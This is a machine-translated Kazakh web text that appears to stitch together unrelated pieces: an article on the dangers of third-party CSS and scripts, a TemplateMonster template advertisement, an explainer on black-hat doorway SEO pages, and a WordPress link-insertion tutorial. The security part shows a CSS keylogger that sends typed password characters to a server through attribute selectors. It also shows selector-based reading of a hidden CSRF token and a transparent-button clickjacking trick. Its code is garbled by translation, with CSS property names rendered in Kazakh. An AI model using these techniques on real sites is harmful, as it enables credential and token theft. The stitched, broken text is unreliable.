Біз сізге үшінші тарап CSS, JavaScript және басқа адамдардың серверлерінің басқа ресурстарын пайдаланып сайтыңызға қалай зиян келтіруге болатынын айтамыз.
Ақпан айының соңында желіде CSS-ті ішінара пайдаланатын кейлоггер пайда болды. Оның көмегімен шабуыл қарапайым: белгілі бір түрі бар өріске енгізілген әрбір таңба үшін (мысалы, пароль) үшінші тарап серверіне өңдік кескінді сұрайтын сұрау жасалады:
енгізу (фон суреті: url("http://localhost:3000/a"); )
Серверде сұрау ретін тіркеуге және енгізілген құпия сөзді оңай есептеуге болады.
Мәселені талқылау барысында кейбіреулер браузер өндірушілеріне түзетумен жұмыс істеуді ұсынды. Біреу мәселенің тек React-like фреймворктарындағы сайттарға қатысты екенін байқап, кінәні соларға аударды.
үшінші тарап суреттері
<
img
src
=
"https://example.com/kitten.jpg">
Егер сіз осындай суретті сайтыңызға қоссаңыз, example.com сайтына тәуелді боласыз. Олар сізді баптай алады әртүрлі жолдар, мысалы, суретті алып тастаңыз - кескіннің орнына 404 аласыз. Немесе олар мысық бейнесін ұнамды емес нәрсемен алмастыра алады.
Сіз пайдаланушыларға суреттің үшінші тарап ресурсынан қосылғанын және оған қатысыңыз жоқ екенін ескерте аласыз. Бұл сізді біраз қиындықтан құтқарады. Бірақ, әрине, қарапайым суретті қосқанда, сіз құпия сөздерге рұқсат бермейсіз.
Үшінші тарап сценарийлері
Бұл мысал example.com үшін әлдеқайда қызықты, өйткені олардың сайтынан сценарийді қосу арқылы сіз оларға өздікін көбірек басқаруға мүмкіндік бересіз. Бұл жағдайда example.com келесі әрекеттерді орындауы мүмкін:
Бет мазмұнын оқу/өзгерту.
Әрбір пайдаланушы әрекетін қадағалаңыз.
Есептеу қиын кодты іске қосыңыз (мысалы, криптоминер).
Cookie файлдарын сұрау.
Жергілікті жадты оқу/өзгерту.
Басқаша айтқанда, қазір example.com көп нәрсені жасай алады.
Болашақта жергілікті жадпен өзара әрекеттесу көбірек әкеледі көбірек проблемалар. Сценарий беттен жойылғаннан кейін де үшінші тарап ресурсы сіздің сайтыңызға кіре алады. Сайтқа үшінші тарап сценарийін қоссаңыз, көзге және оның қауіпсіздігіне толық сенуіңіз керек.
Егер сіз әлі де қате сценарийге тап болсаңыз, Clear-Site-Data тақырыбын пайдаланып көріңіз.
Үшінші тарап CSS
<
link
rel
=
"stylesheet"
href
=
"https://example.com/style.css">
Сайтқа әсер ететін үшінші тарап CSS-коды сурет пен сценарий арасында. Бөтен CSS мүмкін:
Беттегі мазмұнды жою/өзгерту/қосу.
Бет мазмұнына негізделген сұраулар жасаңыз.
Көптеген пайдаланушы әрекеттеріне жауап беріңіз.
CSS жергілікті жадпен өзара әрекеттесе алмайды және криптоминер бетке ендірмейді, бірақ ол ресурс иесіне көп зиян келтіруі мүмкін.
Keylogger
Мақаланың басынан бастап CSS-ті сәл өзгертейік:
енгізу (фон суреті: url("/password?a"); )
енгізу[түрі="құпия сөз"][мән$="a"](
background-image : url("/password?a" );
Бұл код енгізілген «a» таңбасы туралы деректерді сурет сұрауының астында өңдеушіге жібереді. Әр таңба үшін кодты қайталаңыз және сізде CSS пернетақтасы бар.
Әдепкі бойынша, браузерлер мән төлсипатында пайдаланушы енгізген таңбаларды сақтамайды, сондықтан осы сияқты мәндерді синхрондайтын нәрсені пайдалансаңыз, бұл трюк жұмыс істейді, мысалы.
Әрине, бұл мәселені React және ұқсас фреймворктар жағында шешуге болады. Бірақ содан кейін ғана нақты іс шешіледі, ал қалған мәселелер қалады.
Жоғалатын мазмұн
дене (дисплей: жоқ; ) html:: кейін (мазмұн: «HTTP серверінің қатесі»; )
дене (
көрсету: жоқ;
html::кейін(
мазмұны : "HTTP серверінің қатесі" ;
Бұл, әрине, өте ерекше мысал, бірақ әлі де жұмыс істейтін мысал. Елестетіп көріңізші, сіздің пайдаланушылар сайтқа кірген кезде әдеттегіден гөрі көретін болады басты беттүсініксіз қате. Сол сияқты, үшінші тарап коды, мысалы, «сатып алу» түймесін алып тастай алады немесе басқа да жағымсыздықтарды жасай алады.
Мазмұн қосу
Баға-мәні::бұрын (мазмұн: "1"; )
Баға - құн ::бұрын(
мазмұны: «1» ;
Дәл осылай сіздің бағаларыңыз шарықтап кетті.
Жылжымалы мазмұн
Барлығын жою түймесі ( мөлдірлік: 0; орын: абсолютті; жоғарғы: 500 пиксель; сол жақта: 300 пиксель; )
Барлығын жою түймесі (
мөлдірлік: 0
позиция : абсолютті ;
жоғарғы: 500px;
сол жақ: 300px
Пайдаланушы жай ғана баспайтын қорқынышты нәрсені жасайтын түймені алыңыз, оны мөлдір етіп, пайдаланушы міндетті түрде басатын жерге қойыңыз.
Әрине, егер түйме шынымен маңызды нәрсені жасаса, пайдаланушы алдымен ескерту диалогын көреді. Бірақ бұл да проблема емес: оған көбірек CSS қажет. Мысалы, «О, Құдайым, жоқ!» түймесінің мазмұнын «Әрине, мен сенімдімін» деп өзгертуге болады.
Браузер жасаушылар клавиатура трюкін түзететінін елестетіп көріңіз. Шабуыл жасаушылар маңызды құпия сөз өрісінің үстіне қосымша мәтін өрісін қояды және олар бизнеске қайтады.
Оқу атрибуттары
Мән және басқа атрибуттар міндетті түрде құпия сөздерді сақтамайды: шабуылдаушы басқа қызығушылық тудыратын нәрсені табуы мүмкін.
<
input
type
=
"hidden"
name
=
"csrf"
value
=
"1687594325"
>
<
div
class
=
"banner
users
-
birthday
-
today
»>
<
/
div
>
Бұл деректердің барлығын жинауға болады CSS селекторларыжәне оны қалаған жерге жіберіңіз.
Кез келген веб-сайт иесі әдемі дизайнға ие болғысы келеді! Сонымен, веб-ресурс үшін сапалы дизайнды тез және қолжетімді бағамен қалай алуға болады деген сұрақ туындайды?
Үшінші тарап ресурстарын тарту арқылы веб-сайт дизайнын әзірлеу
Не болды үшінші тарап ресурстары? Веб-сайт жасау үшін неден бастарыңызды білмесеңіз, әзірлеуші мен дизайнер қажет екені ешкімге жаңалық болмайды. Бұл шеберлерді жұмысқа тарта отырып, бәрі тез болмайтынына дайын болу керек.
Әр маманның өз көзқарасы бар және әрқайсысы «дұрыс» нәрсені өзінше түсінеді. Сондықтан өз пікіріңізді қорғауға дайын болыңыз. Барлық осындай даулар мен өзгертулер көп уақытты, күш пен ақшаны талап етеді, өйткені әзірлеушілер мен дизайнерлердің қызметтері арзан емес.
Жоғарыда айтылғандарды ескере отырып, сұрақ туындайды: «Неге сайтты құру үшін үшінші тарап ресурстарын тарту керек?». Бір қызығы, бірақ белгілі бір артықшылықтар бар. Біріншіден, мұндай ынтымақтастық сайттың әдемі дизайнын ғана емес, сонымен қатар мүлдем бірегей жасауға мүмкіндік береді. Екіншіден, сіз әрқашан армандаған веб-ресурсыңыздың макетін жүзеге асыра аласыз, тіпті ең күрделі және әртүрлі күрделіліктегі бөлімдер мен мәзірлердің барлық түрлерімен толтырылған.
Үлгілермен әдемі дизайн жасаңыз
Үлгілер- бұл веб-сайтты жасау үшін пайдалануға болатын дайын дизайн. Егер сіз белгілі бір CMS-те жұмыс істеу үшін сайт жасағыңыз келсе, онда сіз осы платформа үшін арнайы жасалған үлгіні таңдай аласыз.
Үлгілерді пайдаланудың қандай пайдасы бар? Жоғарыдағы скриншоттарды қарағаннан кейін, дәлірек айтқанда, компаниядан ұсынылған макеттердің бағасы TemplateMonster, үлгілерге арналған баға саясаты өте адал деп нақты айта аламыз.
Аз ақшаға сіз әдемі дизайнды ғана емес, сонымен қатар заманауи функционалдылықты аласыз. Сонымен қатар, барлық үлгілер теңшеуге болады, сондықтан орналасу дизайнындағы бірдеңе сізге сәйкес келмесе де, оны өзгертуге немесе жоюға болады. Рахмет анық интерфейсбасқару тақтасы арқылы қол жетімді параметрлерді қатысусыз оңай анықтауға болады сыртқы көмекбұл көп уақыт пен бюджетті үнемдейді.
Үлгілердің көпшілігі бейімделгіш болып табылады, бұл құрылғының кез келген түрінде жұмыс істей алатын функционалды сайтты жасауға мүмкіндік береді. Дұрыс үлгіні таңдаған кезде ескеру қажет тағы бір қасиет - бұл әмбебаптық!
Пәрмен TemplateMonsterәртүрлі бағыттағы сайттар үшін, мысалы, интернет-дүкен немесе блог үшін, сондай-ақ әртүрлі тақырыптардағы ресурстар үшін (құрылыс, жиһаз дүкені және т.б.) қолдануға болатын белгілі бір үлгі түрін әзірледі.
Ақыр соңында, дайын макеттермен жұмыс істеудің ең маңызды артықшылығы TemplateMonsterтақырыпты сатып алу арқылы сіз оған қол жеткізе аласыз тегін қызметтехникалық қолдау 24/7. Сондықтан, сатып алынған тақырыпты орнату немесе теңшеуге қатысты сұрақтарыңыз болса, маманның көмегіне жүгіне аласыз!
Әдемі веб-сайт дизайндары - табысқа апаратын алғашқы қадам! Сайтты ашқан пайдаланушылар алдымен ресурсты визуалды түрде бағалайды, содан кейін онда қандай ақпарат бар екенін көреді. Сондықтан алғыңыз келсе көп саныКлиенттер, оқырмандар немесе сатып алушылар сіздің сайтыңызды біржолата тастап кетпеуі үшін олардың назарын бір көргеннен аудара білу маңызды. Бірақ мұны қалай жасауға болады? Дұрыс, пайдаланушылардың қызығушылығын тудыратын және оятатын ресурс үшін әдемі дизайнды пайдаланыңыз.
Сайтты қалай жасау керектігін шешкен кезде (нөлден жасау немесе үлгіні пайдалану) ең қолайлы жолды таңдауға мүмкіндік беретін ресурс үшін негізгі тапсырмаларды анықтау маңызды. Әрине, сіз веб-парақшаны әзірлеуге өзіңіз кірісе аласыз, әсіресе сізге қажет нәрсені жақсы білетіндіктен! Бірақ, бұл жағдайда белгілі бір дағдылар мен білім деңгейі қажет.
Егер сізде мұның бәрі болмаса, бірақ сайттың дизайнын өзіңіз жасағыңыз келсе, үлгілерді таңдаңыз TemplateMonster. Мұнда сізге үлкен дағдылар қажет емес және тіпті жаңадан келген пайдаланушы үшін бәрі түсінікті!
Есік (син. dor, ағылшын тілінен шыққан есік немесе алдыңғы есік)
— қара қалпақ SEO құралы, пайдаланушыларды басқа онлайн ресурсқа қайта бағыттауға арналған сайт.
Сайт пайдаланушының көзқарасы бойынша пайдасыз, ол көбінесе өз бетін көру мүмкіндігіне ие болмайды. Есік сайттары жиі тегін хостингтерде тіркеледі.
Мәтін мазмұны көбінесе мағынасыз, көп саны бар сөйлемдердің үзінділерінен тұрады кілт сөздер. Мұндай сайттар тек интернетті жауып тастайды. Дораның негізгі мақсаты - индекстелу және іздеу нәтижелеріне ену.
Есіктердің типологиясы
Алгоритмдердің пайда болуымен ресурстардың өзектілігі сауатты мазмұн мен жақсы ұйымдастырылған негізде есептелді. семантикалық өзегі. Бірақ материалдың оқылуын сақтай отырып, барлық сұраныстар үшін ресурс беттерін жобалау мүмкін болмады, бұл есіктердің сөзсіз пайда болуына әкелді. Сілтеме рейтингі пайда болғаннан кейін, жылжытудың бұл әдісі өзінің заманауи түрінде пайда болды, атап айтқанда пайдаланушыларды басқа сайтқа қайта бағыттау және сілтеме салмағын тарату.
Есіктердің арасында шартты түрде келесі түрлерді бөлуге болады:
Ақ есіктер - авторлық құқықпен қорғалған мазмұн мен жоғары сапалы графика болуы мүмкін заңға бағынатын сайттар. Мұндай сайтқа кіргеннен кейін пайдаланушы жарнамаланған ресурсқа жету үшін сілтемелерді орындай алады.
Gray dora - бұл негізгі міндеті сілтемені тасымалдау болып табылатын сайттар, сондықтан мұндай сайттардағы мәтіндік материалдар бірегей және түсінікті, ал сілтемелер мәтіндік ортаға енгізіледі. TIC және PR есіктерінің қолдауымен негізгі сайт сілтеме салмағын арттыра алады.
Қара есіктер - негізгі міндеті автоматты түрде қайта бағыттау немесе үшінші тарап ресурсына қайта бағыттау болып табылатын сайттар, оны іздеу жүйелері құптамайды. Бұл тапсырманы орындау үшін мета тегтер немесе java сценарийлері конфигурацияланады. Мәнсіз мәтіндер қара есіктерге орналастырылған, өйткені пайдаланушының бәрібір оларды оқуға уақыты болмайды. Негізгі мақсат - негізгі сайтты жоғарылату іздеу нәтижелері. Есіктерді құруда доргендер деп аталатындар талап етілетін сұраулары бар мәтіндерді «ойлап шығаратын» адам төзгісіз үлес қосады.
Есік және SEO
Есік ойықтары кіреді тиімді әдістервеб-сайтты оңтайландыру. Іздеу жүйелерінен айыппұлдарды болдырмау қиын емес - сіз жай ғана ұстануыңыз керек қарапайым ережелер. Есіктерді жасау үшін көп уақыт қажет және шын мәнінде оларды оңтайландыру қарапайым ресурстарды жылжытудан еш айырмашылығы жоқ.
Есіктер мен іздеу жүйелері
Есік арқылы жылжыту үшін жүйелерге тыйым салынады немесе пессимизацияланады. Яндекс ережелерінде пайдаланушыларды үшінші тарап ресурстарына тарататын сайттар спам ретінде жіктеліп, индекстен жойылады деп жазылған. Бірақ негізгі мекенжайдың қосалқы доменіндегі есіктерді қоспағанда, тек есік ойықтарына тыйым салынады немесе пессимизацияланады; негізгі сайт өзгеріссіз қалады.
Бірақ шынымен іздеу жүйелері dors сирек жазаланады, өйткені олар оларды жақсылыққа бағыттайтын өте беделді сайттармен (мысалы, microsoft.ru) оңай шатастыруы мүмкін.
Ақ және сұр дораларды спам деп айыптауға болмайды.
Олармен қалай күресуге болады?
Жоғарыда айтылғандай, іздеу жүйелеріне есіктерді табу қиын. Алгоритмдер үнемі жаңартылып, мета тегтер мен сценарийлерді пайдаланып қайта бағыттау әрекеттерін анықтауға және тоқтатуға тырысса да, есіктердің дамуы да тоқтамайды, ал веб-шеберлер пайдаланушыларды қайта бағыттаудың инновациялық әдістерін үнемі қосып отырады.
WordPress жүйесіндегі үшінші тарап ресурстарына сілтемелер мен беттер мен блог жазбалары арасындағы сілтемелерді қосудың ең оңай жолы - редакторда орнатылған Сілтемені кірістіру/өңдеу құралын пайдалану. Белгілі бір абзацқа, абзацқа, беттер мен жазбалар ішіндегі жолдарға HTML кодында қолмен жасалған сілтемелерді кірістіру біршама қиынырақ.
Үшінші тарап ресурстарына сілтемелер
1. Біз сілтемені қойғымыз келетін шолғышта үшінші тарап сайтының бетін ашыңыз және URL мекенжайын мекенжай жолағынан алмасу буферіне көшіріңіз.
2. Жазбаны немесе бетті өңдеуге арналған терезеге өтіңіз, болашақ сілтеменің мәтінін таңдаңыз немесе сілтеме болуы керек жерге курсорды қойыңыз, құралдар тақтасын басыңыз. мәтіндік редактор«Сілтемені кірістіру/өзгерту» кеңесі бар түйме. IN алдыңғы нұсқалар WordPress бірден «Сілтемені кірістіру/өзгерту» тақырыбымен негізгі терезені ашты. Қателеспесем, 4.5 нұсқасынан бастап ол мекенжайды енгізу өрісі және екі түймесі бар тарылған пішінде ашыла бастады: «Қолдану» және «Сілтеме параметрлері» - бұл түйме «Сілтемені кірістіру / өзгерту» терезесін кеңейтеді.
3. Сілтеме қосу үшін ашылатын терезеде алмасу буферінен мекенжайды қойып, «Қолдану» түймесін басыңыз (егер сілтеме мәтіні бұрын таңдалмаған болса, 5-параграфтағыдай көршілес «Сілтеме параметрлері» түймесін басыңыз. , сілтеме мәтінін қосу үшін):
Мысалда сілтеме мәтіні алдын ала таңдалғандықтан, сілтеме дайын: Үшінші тарап сілтемесі: Арзан рейстер. 4. URL мекенжайын өзгерту үшін, көрсетілетін мәтінді, ашу әдісін (ағымдағы немесе жаңа терезеде) қосу немесе өңдеу үшін сілтемені таңдап, пайда болған терезеде «Өзгерту» түймесін басыңыз:
5. URL мекенжайын қосу өрісі бар таныс терезе ашылады, онда біз үлкейтілген терезені алу үшін «Сілтеме параметрлері» түймесін басамыз:
6. «Сілтемені енгізу/өзгерту» негізгі терезесі ашылады:
Бұл терезеде «Жаңа қойындыда ашу» жанындағы құсбелгіні қоюға, қажет болған жағдайда URL мекенжайын ауыстыруға, сілтеме мәтінін қосуға немесе өзгертуге болады. Сілтемені мәтінді алдын ала таңдамай-ақ кірістіруге болатындықтан, бірақ оны «Сілтемені кірістіру / өңдеу» терезесінің «Сілтеме мәтіні» өрісіне қосу арқылы сілтеме курсор бастапқыда тұрған жерге қосылады. «Жаңарту» түймесін басыңыз.
Беттер мен блог жазбалары арасындағы сілтемелер
Блогыңыздағы бетке немесе жазбаға сілтеме енгізу үшін сілтеменің мәтінін таңдаңыз немесе сілтеме қосылатын жерге курсорды қойыңыз. Құралдар тақтасындағы «Сілтемені кірістіру/өңдеу» түймесін басыңыз. Ашылған терезеде «Сілтеме параметрлері» түймесін басыңыз, содан кейін «Сілтемені енгізу / өзгерту» негізгі терезесі ашылады:
Терезенің төменгі жартысындағы тізімнен бетті немесе жазбаны таңдаңыз, оны басыңыз, URL автоматты түрде енгізіледі, сілтеме мәтіні, егер алдын ала таңдалмаған болса, тиісті жолаққа қолмен енгізуге немесе алмасу буферінен қоюға болады. алдымен беттің атын немесе тізімдегі жазбаны көшіру арқылы. Қажет болса, «Жаңа қойындыда ашу» құсбелгісін қойыңыз және, әрине, «Сілтеме қосу» түймесін басыңыз. Менің блогыма сілтеме қосылды: Блог бетіне сілтеме: .
Беттер мен жазбалардағы сілтемелер
Беттегі немесе жазбадағы белгілі бір орынға сілтеме жасау үшін бұл орын қандай да бір жолмен тегтелуі керек. Мұны істеу үшін оның жанына бетбелгі немесе оны зәкір деп те атайды. Айтпақшы, «Көрнекі» қойындысында бұл бетбелгі якорь фигурасымен белгіленеді. Мысал ретінде осы мақаланың мазмұнына сілтемелер енгізуді және мазмұн кестесінен оларға өту үшін тиісті бөлімдердің тақырыптарына бетбелгілерді (зәкірлерді) кірістіруді қарастырыңыз.
Бетбелгілер HTML редакторында («Мәтін» қойындысында) кірістіріледі және келесі құрылым болып табылады:
Сілтеме1 орнына бетбелгінің атын енгізіңіз.
Сілтеме1 орнына сілтемені орындағыңыз келетін бетбелгінің атын енгізіңіз, # таңбасы (фунт белгісі, хэш) оның идентификаторынан кейін тұрғанын білдіреді. Сілтемедегі идентификаторсыз # беттің басын көрсетеді және басына (жоғары) оралу үшін пайдаланылады.
Енді бәрі тәртіппен:
1. Біз бетбелгінің атауын ойлап табамыз және «Мәтін» қойындысын таңдау арқылы HTML редакторына өтеміз.
2. Мақаланың дұрыс жеріне бетбелгі қойыңыз. Мен бөлім тақырыптарының жанына якорь енгіздім:
Мәтінді ашу және жабу тегтерінің арасына орналастырсаңыз а, ол сілтеме ретінде боялады. 3. Мазмұндағы бетбелгілерге сілтемелерді кірістіріңіз:
4. Енді сіз «Жоғары» сілтемесін қоса, сынай аласыз:
Жоғары
5. Толық сілтемебетбелгі келесідей көрінеді: бет URL/#link1. Оны қолмен құрастырудың қажеті жоқ, бетбелгіге сілтеме бойынша өтіп, толық URL мекенжайын көшіріңіз мекенжай жолағы. Бұл мекенжайды басқа сайттардан бетбелгіге өту үшін пайдалануға болады.